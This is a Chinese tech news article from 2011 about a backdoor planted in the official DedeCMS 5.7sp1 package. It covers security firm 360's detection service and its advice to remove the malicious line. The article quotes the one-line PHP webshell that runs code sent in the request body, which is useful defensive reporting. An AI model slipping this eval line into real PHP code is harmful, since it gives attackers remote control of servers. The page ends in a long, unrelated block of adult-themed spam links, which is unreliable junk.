DedeCMS官方版本驚曝后門(mén) 360緊急推出安全檢測(cè)

作者:IT新聞網(wǎng) 來(lái)源:IT新聞網(wǎng) 2011-12-30 03:12:26 閱讀 我要評(píng)論 直達(dá)商品

360建議,使用DedeCMS的網(wǎng)站站長(zhǎng)應(yīng)立刻檢測(cè)include/shoper.class.php文件中是否存在后門(mén)代碼"@eval(file_get_contents('php://input'));",如存在應(yīng)刪除該行代碼,如不存在則證明沒(méi)有該"一句話后門(mén)"。

【IT商業(yè)新聞網(wǎng)訊】日前,織夢(mèng)內(nèi)容管理系統(tǒng)(DedeCMS)遭烏云漏洞平臺(tái)曝光稱(chēng),DedeCMS 5.7sp1官方安裝包被黑客植入后門(mén)。經(jīng)360安全檢測(cè)平臺(tái)檢測(cè),該后門(mén)確實(shí)曾一度出現(xiàn)在織夢(mèng)官網(wǎng)版本中。為此,360于當(dāng)天緊急推出DedeCMS后門(mén)檢測(cè)服務(wù),并已對(duì)大批中招網(wǎng)站發(fā)出郵件報(bào)警。

360網(wǎng)站安全檢測(cè)平臺(tái)服務(wù)網(wǎng)址:http://webscan.360.cn

圖1:DedeCms被植入的后門(mén)代碼

據(jù)悉,DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個(gè)人網(wǎng)站上,是國(guó)內(nèi)用戶量最大的PHP類(lèi)CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn),此次DedeCMS曝出的后門(mén)名為"一句話后門(mén)",其惡意代碼存在于DedeCMS購(gòu)物車(chē)類(lèi)文件中,凡是調(diào)用該購(gòu)物車(chē)類(lèi)的文件均會(huì)觸發(fā)后門(mén),從而導(dǎo)致整個(gè)網(wǎng)站甚至服務(wù)器遭黑客進(jìn)一步控制。

360建議,使用DedeCMS的網(wǎng)站站長(zhǎng)應(yīng)立刻檢測(cè)include/shoper.class.php文件中是否存在后門(mén)代碼"@eval(file_get_contents('php://input'));",如存在應(yīng)刪除該行代碼,如不存在則證明沒(méi)有該"一句話后門(mén)"。

作為開(kāi)源軟件,DedeCMS此次曝出后門(mén)并非個(gè)例。因?yàn)樵趪?guó)際上,Linux等多款著名的開(kāi)源軟件也曾遭黑客植入后門(mén)。不過(guò),烏云漏洞平臺(tái)公開(kāi)的織夢(mèng)官方郵件顯示,織夢(mèng)開(kāi)發(fā)團(tuán)隊(duì)否認(rèn)了產(chǎn)品曾被植入后門(mén),但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進(jìn)行了修改。

圖2:測(cè)試驗(yàn)證PHP代碼可被DedeCMS后門(mén)執(zhí)行


  推薦閱讀

  李開(kāi)復(fù)微博稱(chēng)中國(guó)O2O機(jī)會(huì)大 但并不好做

李開(kāi)復(fù)在微博寫(xiě)道:“O2O就是(1)幫助線上用戶發(fā)現(xiàn)和推薦消費(fèi)場(chǎng)所,(2)為線下服務(wù)業(yè)帶來(lái)線上客流,(3)可以檢測(cè)效果,最好可以線上支付。美國(guó)的O2O往往是幫助已上線的商家拉顧客,但是中國(guó)線下商家一般對(duì)互聯(lián)網(wǎng)認(rèn)知和接>>>詳細(xì)閱讀


本文標(biāo)題:DedeCMS官方版本驚曝后門(mén) 360緊急推出安全檢測(cè)

地址:http://m.sdlzkt.com/a/guandian/yejie/20111230/161793.html

樂(lè)購(gòu)科技部分新聞及文章轉(zhuǎn)載自互聯(lián)網(wǎng),供讀者交流和學(xué)習(xí),若有涉及作者版權(quán)等問(wèn)題請(qǐng)及時(shí)與我們聯(lián)系,以便更正、刪除或按規(guī)定辦理。感謝所有提供資訊的網(wǎng)站,歡迎各類(lèi)媒體與樂(lè)購(gòu)科技進(jìn)行文章共享合作。

網(wǎng)友點(diǎn)評(píng)
我的評(píng)論: 人參與評(píng)論
驗(yàn)證碼: 匿名回答
網(wǎng)友評(píng)論(點(diǎn)擊查看更多條評(píng)論)
友情提示: 登錄后發(fā)表評(píng)論,可以直接從評(píng)論中的用戶名進(jìn)入您的個(gè)人空間,讓更多網(wǎng)友認(rèn)識(shí)您。
自媒體專(zhuān)欄

評(píng)論

熱度

主站蜘蛛池模板: 成人综合激情另类小说| 欧美成人精品大片免费流量| 亚洲精品成人片在线观看精品字幕| 成人试看120秒体验区| 国产精品成人无码久久久| 国产成人一区二区三区高清 | 99精品国产成人一区二区| 色综合天天综合网国产成人| 成人在线观看免费| 亚洲精品成人片在线观看精品字幕| 无遮挡韩国成人羞羞漫画视频| 国产日韩成人内射视频| 亚洲av成人一区二区三区| 成人动漫视频在线| 亚洲国产成人久久一区二区三区 | 四虎成人免费影院网址| 成人怡红院视频在线观看| 亚洲av无码成人精品区狼人影院| 成人免费在线视频网站| 黄色成人免费网站| 亚洲成人免费网站| 国产成人涩涩涩视频在线观看| 欧美日韩一区二区成人午夜电影| 亚洲精品成人av在线| 国产成人精品视频播放| 成人一级片在线观看| 成人国产在线观看高清不卡| 2022国产成人精品福利网站| 亚洲国产精品成人精品无码区在线 | 国产成人av免费观看| 国产成人综合在线观看网站| 成人欧美一区二区三区小说| 欧洲成人r片在线观看| 亚洲AV无码成人精品区在线观看 | 国产成人欧美一区二区三区| 成人免费视频小说| 成人欧美日韩一区二区三区| 日韩成人一区ftp在线播放| 欧美成人性色xxxxx视频大| 麻豆精品传媒成人精品| 成人理论电影在线观看|